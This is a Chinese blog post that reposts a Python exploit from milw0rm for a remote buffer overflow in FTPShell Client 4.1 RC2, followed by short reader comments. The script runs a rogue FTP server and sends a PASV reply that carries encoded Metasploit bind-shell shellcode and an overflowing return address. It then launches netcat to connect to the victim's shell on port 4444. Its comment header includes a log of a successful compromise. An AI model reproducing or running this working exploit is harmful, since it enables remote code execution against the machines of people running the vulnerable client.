首页 > 网络安全 > FTPShell客户端4.1 RC2远程缓冲区溢出通杀漏洞

FTPShell客户端4.1 RC2远程缓冲区溢出通杀漏洞

FTPShell客户端4.1 RC2通杀远程缓冲区溢出漏洞
测试通过平台:xp_sp3,w2k_sp4

复制内容到剪贴板程序代码程序代码
#!/usr/bin/python
# _  _   _         __    _     _ _  
#| || | (_)  ___  /  \  | |__ | | |
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  \__/  |_\_\   |_|
#
#[+] Bug :     FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)
#[+] Author :     His0k4
#[+] Tested on : xp_sp3,w2k_sp4
#[+] Greetz :     All friends
#         piece of "zlabiya"

#—exploit-log—
#attacker@dz-labs:~/pentests/fuzzers/ftp$ python FTPShell_client.py
#[+] Listening on [FTP] 21
#[+] Connection accepted from: 192.168.1.3
#[+] Sending the malicious pasv response…
#[+] Done, wait for trying to connect to port 4444 on the target…
#
#(UNKNOWN) [192.168.1.3] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\victim\Desktop>

from socket import *
import os
import time

# win32_bind –  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
stage2 =(
"\x44\x7A\x32\x37\x44\x7A\x32\x37"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38"
"\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x34\x4e\x43\x4b\x58\x4e\x57"
"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x38"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x48"
"\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x45\x4e\x41\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x38"
"\x49\x58\x4e\x56\x46\x52\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d"
"\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x58\x42\x34\x4e\x30\x4b\x48"
"\x42\x37\x4e\x31\x4d\x4a\x4b\x38\x42\x44\x4a\x30\x50\x35\x4a\x36"
"\x50\x48\x50\x44\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46"
"\x43\x55\x48\x46\x4a\x46\x43\x43\x44\x33\x4a\x56\x47\x57\x43\x57"
"\x44\x43\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x55\x4c\x56\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
"\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x35\x43\x35\x43\x55\x43\x54"
"\x43\x55\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x51"
"\x4e\x55\x48\x46\x43\x55\x49\x38\x41\x4e\x45\x39\x4a\x36\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
"\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x52"
"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x44\x47\x55\x4f\x4f\x48\x4d"
"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
"\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x36\x48\x46\x4a\x56\x43\x36"
"\x4d\x36\x49\x58\x45\x4e\x4c\x46\x42\x35\x49\x55\x49\x52\x4e\x4c"
"\x49\x58\x47\x4e\x4c\x46\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x32"
"\x43\x39\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x54\x4f\x4f"
"\x48\x4d\x4b\x55\x47\x55\x44\x35\x41\x45\x41\x35\x41\x55\x4c\x46"
"\x41\x30\x41\x55\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x36"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
"\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x43\x55\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a")

stage1=(
#

  • Using Msf::Encoder::PexAlphaNum with final size of 141 bytes
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x48\x36\x41\x38\x4c\x4c"
    "\x4f\x4f\x4f\x50\x44\x34\x44\x55\x4c\x46\x44\x50\x4a\x35\x4d\x4c"
    "\x50\x52\x4e\x33\x45\x30\x4c\x35\x46\x37\x4f\x4e\x4a\x4b\x46\x54"
    "\x4c\x47\x44\x43\x47\x33\x4b\x58\x4c\x4f\x4f\x4a\x45\x37\x4c\x4e"
    "\x4f\x4a\x45\x57\x47\x4e\x4f\x4f\x47\x4e\x4c\x50\x5a")

    buffer =  stage1 #<———————————|
    buffer += '\x41'*(412-len(stage1)) #            |
    buffer += '\xC5\xB3\x43\x00'    # add esp,8;retn—-|

    s = socket(AF_INET, SOCK_STREAM)
    s.bind(("0.0.0.0", 21))
    s.listen(1)
    print "

  • [+] Listening on [FTP] 21"
    c, addr = s.accept()

    print "[+] Connection accepted from: %s" % (addr[0])

    c.send("220 Hey victim batet fik!\r\n")
    c.recv(1024)
    time.sleep(0.5)
    c.send("331 User anonymous OK Password required\r\n")
    c.recv(1024)
    time.sleep(0.5)
    c.send("230 Ok.\r\n")
    c.recv(1024)

    # Enable this when client performs CWD command
    #time.sleep(1)
    #c.send("250 CWD command successful.\r\n")
    #c.recv(1024)

    time.sleep(0.5)
    c.send("257 \x22/\x22 is current directory\r\n")
    c.recv(1024)
    time.sleep(0.5)
    c.send("200 Type set to A.\r\n")
    c.recv(1024)
    time.sleep(0.5)
    print "[+] Sending the malicious pasv response…"
    c.send("227 "+stage2+"\r\n"
    "227 Entering Passive Mode ("+buffer+").\r\n"
    "\r\n")
    time.sleep(2)
    c.close()
    s.close()
    print("[+] Done, wait for trying to connect to the target on port 4444…\n")
    time.sleep(25)
    os.system("nc -nv "+addr[0]+" 4444")

    # milw0rm.com [2009-09-09]

    转载请尊重版权,出处:秋天博客
    本文链接: https://www.cfresh.net/web-security/91

    1. joyla
      joyla 1月 14th, 2010 @ 13:52 | #-31

      啊哦!啊哦!
      反正我不用这个 我也不做坏事!呵呵

    2. 海天无影
      海天无影 9月 12th, 2009 @ 10:24 | #-32

      网马 又见网马

    3. 0point
      0point 9月 11th, 2009 @ 14:17 | #-33

      @真好网
      的确有点高深,全是python代码。

    4. 真好网
      真好网 9月 10th, 2009 @ 19:34 | #-34

      是太高深了,还是怎么回事呢?我看不懂?没碰到过。

    5. 0point
      0point 9月 10th, 2009 @ 14:43 | #-35

      @Tony
      Tony出家念经了,善哉善哉,哈哈。
      @志言
      权当什么都没看见~,呵呵。

    6. 志言
      志言 9月 10th, 2009 @ 12:40 | #-36

      我没看懂啊

    7. TONY
      TONY 9月 10th, 2009 @ 11:31 | #-37

    评论提交中, 请稍候...

    留言



    注意: 您给他人的评论回复将通过邮件通知到对方。

    可以使用的标签: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>
    Trackbacks & Pingbacks ( 0 )
    1. 还没有 trackbacks